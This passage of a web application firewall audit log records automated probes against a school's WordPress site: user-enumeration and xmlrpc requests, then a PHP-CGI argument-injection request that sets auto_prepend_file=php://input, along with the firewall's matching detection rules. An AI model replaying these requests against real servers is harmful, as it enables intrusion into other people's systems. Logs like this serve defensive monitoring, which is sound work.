l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2618445-Z-- --f1e3564a-A-- [08/May/2025:11:05:52 +0700] aBwtoMP9GxxPAbCroFbNIQAAAEo 103.236.140.4 43900 103.236.140.4 8181 --f1e3564a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f1e3564a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1e3564a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677152261355 2547 (- - -) Stopwatch2: 1746677152261355 2547; combined=1139, p1=367, p2=740, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1e3564a-Z-- --3802bd7a-A-- [08/May/2025:11:05:56 +0700] aBwtpMP9GxxPAbCroFbNIgAAAEE 103.236.140.4 43904 103.236.140.4 8181 --3802bd7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3802bd7a-C-- demo.sayHello --3802bd7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3802bd7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677156198971 3592 (- - -) Stopwatch2: 1746677156198971 3592; combined=2775, p1=341, p2=2282, p3=21, p4=23, p5=64, sr=47, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3802bd7a-Z-- --430c360e-A-- [08/May/2025:11:06:05 +0700] aBwtrcP9GxxPAbCroFbNJAAAAEs 103.236.140.4 43908 103.236.140.4 8181 --430c360e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --430c360e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --430c360e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677165719687 3202 (- - -) Stopwatch2: 1746677165719687 3202; combined=1415, p1=492, p2=891, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --430c360e-Z-- --b84ddf71-A-- [08/May/2025:11:06:07 +0700] aBwtrys5rYyn3jlLjjK_dgAAAMc 103.236.140.4 43910 103.236.140.4 8181 --b84ddf71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b84ddf71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84ddf71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677167419321 2176 (- - -) Stopwatch2: 1746677167419321 2176; combined=986, p1=346, p2=613, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84ddf71-Z-- --ebb10559-A-- [08/May/2025:11:06:10 +0700] aBwtsqcs1DvJ_HgMHE_yRAAAABY 103.236.140.4 43916 103.236.140.4 8181 --ebb10559-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ebb10559-C-- demo.sayHello --ebb10559-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebb10559-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677170168832 4733 (- - -) Stopwatch2: 1746677170168832 4733; combined=3665, p1=462, p2=3006, p3=21, p4=25, p5=88, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebb10559-Z-- --e626eb36-A-- [08/May/2025:11:06:12 +0700] aBwttMP9GxxPAbCroFbNJwAAAEc 103.236.140.4 43918 103.236.140.4 8181 --e626eb36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e626eb36-C-- demo.sayHello --e626eb36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e626eb36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677172208592 4775 (- - -) Stopwatch2: 1746677172208592 4775; combined=3740, p1=452, p2=3084, p3=26, p4=29, p5=88, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e626eb36-Z-- --40321d38-A-- [08/May/2025:11:08:58 +0700] aBwuWqcs1DvJ_HgMHE_ySQAAABg 103.236.140.4 43944 103.236.140.4 8181 --40321d38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40321d38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40321d38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677338889797 3006 (- - -) Stopwatch2: 1746677338889797 3006; combined=1297, p1=445, p2=823, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40321d38-Z-- --8d1ea660-A-- [08/May/2025:11:09:02 +0700] aBwuXqcs1DvJ_HgMHE_yTAAAAAk 103.236.140.4 43952 103.236.140.4 8181 --8d1ea660-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8d1ea660-C-- demo.sayHello --8d1ea660-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d1ea660-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677342375367 6273 (- - -) Stopwatch2: 1746677342375367 6273; combined=4458, p1=608, p2=3536, p3=43, p4=43, p5=136, sr=77, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d1ea660-Z-- --e4129517-A-- [08/May/2025:11:10:28 +0700] aBwutKcs1DvJ_HgMHE_yTwAAAAs 103.236.140.4 43960 103.236.140.4 8181 --e4129517-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e4129517-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4129517-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677428068075 2803 (- - -) Stopwatch2: 1746677428068075 2803; combined=1261, p1=461, p2=771, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4129517-Z-- --465f440b-A-- [08/May/2025:11:10:31 +0700] aBwut6cs1DvJ_HgMHE_yUQAAAAg 103.236.140.4 43964 103.236.140.4 8181 --465f440b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --465f440b-C-- demo.sayHello --465f440b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --465f440b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677431883338 5211 (- - -) Stopwatch2: 1746677431883338 5211; combined=3880, p1=434, p2=3232, p3=23, p4=26, p5=96, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --465f440b-Z-- --9d63423c-A-- [08/May/2025:11:12:42 +0700] aBwvOo4K347NtBcwXKwGXAAAAJU 103.236.140.4 43974 103.236.140.4 8181 --9d63423c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.182.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.182.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d63423c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d63423c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677562479108 2873 (- - -) Stopwatch2: 1746677562479108 2873; combined=1283, p1=413, p2=842, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d63423c-Z-- --8973ab43-A-- [08/May/2025:11:14:51 +0700] aBwvu44K347NtBcwXKwGXgAAAIo 103.236.140.4 43988 103.236.140.4 8181 --8973ab43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8973ab43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8973ab43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677691119072 2851 (- - -) Stopwatch2: 1746677691119072 2851; combined=1258, p1=455, p2=774, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8973ab43-Z-- --961be337-A-- [08/May/2025:11:14:55 +0700] aBwvv44K347NtBcwXKwGXwAAAJY 103.236.140.4 43992 103.236.140.4 8181 --961be337-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --961be337-C-- demo.sayHello --961be337-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --961be337-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677695361749 5818 (- - -) Stopwatch2: 1746677695361749 5818; combined=4273, p1=571, p2=3441, p3=36, p4=38, p5=108, sr=82, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --961be337-Z-- --8534bb37-A-- [08/May/2025:11:16:39 +0700] aBwwJ44K347NtBcwXKwGYwAAAIU 103.236.140.4 44004 103.236.140.4 8181 --8534bb37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8534bb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8534bb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677799468766 3472 (- - -) Stopwatch2: 1746677799468766 3472; combined=1487, p1=507, p2=947, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8534bb37-Z-- --5549490d-A-- [08/May/2025:11:16:45 +0700] aBwwLY4K347NtBcwXKwGZQAAAIE 103.236.140.4 44008 103.236.140.4 8181 --5549490d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5549490d-C-- demo.sayHello --5549490d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5549490d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677805237933 5470 (- - -) Stopwatch2: 1746677805237933 5470; combined=4114, p1=506, p2=3386, p3=29, p4=32, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5549490d-Z-- --4fc55e02-A-- [08/May/2025:11:32:09 +0700] aBwzyacs1DvJ_HgMHE_yXQAAAAw 103.236.140.4 44136 103.236.140.4 8181 --4fc55e02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 208.96.130.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.96.130.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4fc55e02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fc55e02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746678729908172 3375 (- - -) Stopwatch2: 1746678729908172 3375; combined=1437, p1=489, p2=915, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fc55e02-Z-- --21cab73d-A-- [08/May/2025:11:43:15 +0700] aBw2Y44K347NtBcwXKwGpAAAAJE 103.236.140.4 44276 103.236.140.4 8181 --21cab73d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --21cab73d-C-- --21cab73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21cab73d-E-- --21cab73d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within 